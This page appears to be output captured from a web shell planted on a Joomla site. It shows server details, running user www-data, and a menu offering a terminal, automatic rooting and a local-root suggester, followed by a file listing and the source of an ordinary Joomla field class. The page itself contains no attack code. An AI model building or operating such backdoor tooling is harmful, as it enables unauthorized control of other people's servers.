Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
teste /
libraries /
src /
Form /
Field /
Delete
Unzip
Name
Size
Permission
Date
Action
AuthorField.php
1.53
KB
-rw-r--r--
2017-10-04 08:52
CaptchaField.php
3.44
KB
-rw-r--r--
2017-10-04 08:52
ChromestyleField.php
5.58
KB
-rw-r--r--
2017-10-04 08:52
ContenthistoryField.php
1.9
KB
-rw-r--r--
2017-10-04 08:52
ContentlanguageField.php
941
B
-rw-r--r--
2017-10-04 08:52
ContenttypeField.php
2.28
KB
-rw-r--r--
2017-10-04 08:52
EditorField.php
7.28
KB
-rw-r--r--
2017-10-04 08:52
FrontendlanguageField.php
1.96
KB
-rw-r--r--
2017-10-04 08:52
HeadertagField.php
1021
B
-rw-r--r--
2017-10-04 08:52
HelpsiteField.php
1.64
KB
-rw-r--r--
2017-10-04 08:52
LastvisitdaterangeField.php
1.49
KB
-rw-r--r--
2017-10-04 08:52
LimitboxField.php
2.24
KB
-rw-r--r--
2017-10-04 08:52
MediaField.php
6.14
KB
-rw-r--r--
2017-10-04 08:52
MenuField.php
2.88
KB
-rw-r--r--
2017-10-04 08:52
MenuitemField.php
5.91
KB
-rw-r--r--
2017-10-04 08:52
ModuleorderField.php
3.25
KB
-rw-r--r--
2017-10-04 08:52
ModulepositionField.php
4.07
KB
-rw-r--r--
2017-10-04 08:52
ModuletagField.php
1.04
KB
-rw-r--r--
2017-10-04 08:52
OrderingField.php
4.68
KB
-rw-r--r--
2017-10-04 08:52
PluginstatusField.php
747
B
-rw-r--r--
2017-10-04 08:52
RedirectStatusField.php
799
B
-rw-r--r--
2017-10-04 08:52
RegistrationdaterangeField.php
1.48
KB
-rw-r--r--
2017-10-04 08:52
StatusField.php
817
B
-rw-r--r--
2017-10-04 08:52
TagField.php
5.56
KB
-rw-r--r--
2017-10-04 08:52
TemplatestyleField.php
4.66
KB
-rw-r--r--
2017-10-04 08:52
UserField.php
3.85
KB
-rw-r--r--
2017-10-04 08:52
UseractiveField.php
1.17
KB
-rw-r--r--
2017-10-04 08:52
UsergrouplistField.php
2.71
KB
-rw-r--r--
2017-10-04 08:52
UserstateField.php
770
B
-rw-r--r--
2017-10-04 08:52
Save
Rename
<?php /** * Joomla! Content Management System * * @copyright Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ namespace Joomla\CMS\Form\Field; defined('JPATH_PLATFORM') or die; use Joomla\CMS\Form\FormHelper; FormHelper::loadFieldClass('list'); /** * Field to load a list of posible item count limits * * @since 3.2 */ class LimitboxField extends \JFormFieldList { /** * The form field type. * * @var string * @since 3.2 */ public $type = 'Limitbox'; /** * Cached array of the category items. * * @var array * @since 3.2 */ protected static $options = array(); /** * Default options * * @var array */ protected $defaultLimits = array(5, 10, 15, 20, 25, 30, 50, 100, 200, 500); /** * Method to get the options to populate to populate list * * @return array The field option objects. * * @since 3.2 */ protected function getOptions() { // Accepted modifiers $hash = md5($this->element); if (!isset(static::$options[$hash])) { static::$options[$hash] = parent::getOptions(); $options = array(); $limits = $this->defaultLimits; // Limits manually specified if (isset($this->element['limits'])) { $limits = explode(',', $this->element['limits']); } // User wants to add custom limits if (isset($this->element['append'])) { $limits = array_unique(array_merge($limits, explode(',', $this->element['append']))); } // User wants to remove some default limits if (isset($this->element['remove'])) { $limits = array_diff($limits, explode(',', $this->element['remove'])); } // Order the options asort($limits); // Add an option to show all? $showAll = isset($this->element['showall']) ? (string) $this->element['showall'] === 'true' : true; if ($showAll) { $limits[] = 0; } if (!empty($limits)) { foreach ($limits as $value) { $options[] = (object) array( 'value' => $value, 'text' => ($value != 0) ? \JText::_('J' . $value) : \JText::_('JALL'), ); } static::$options[$hash] = array_merge(static::$options[$hash], $options); } } return static::$options[$hash]; } }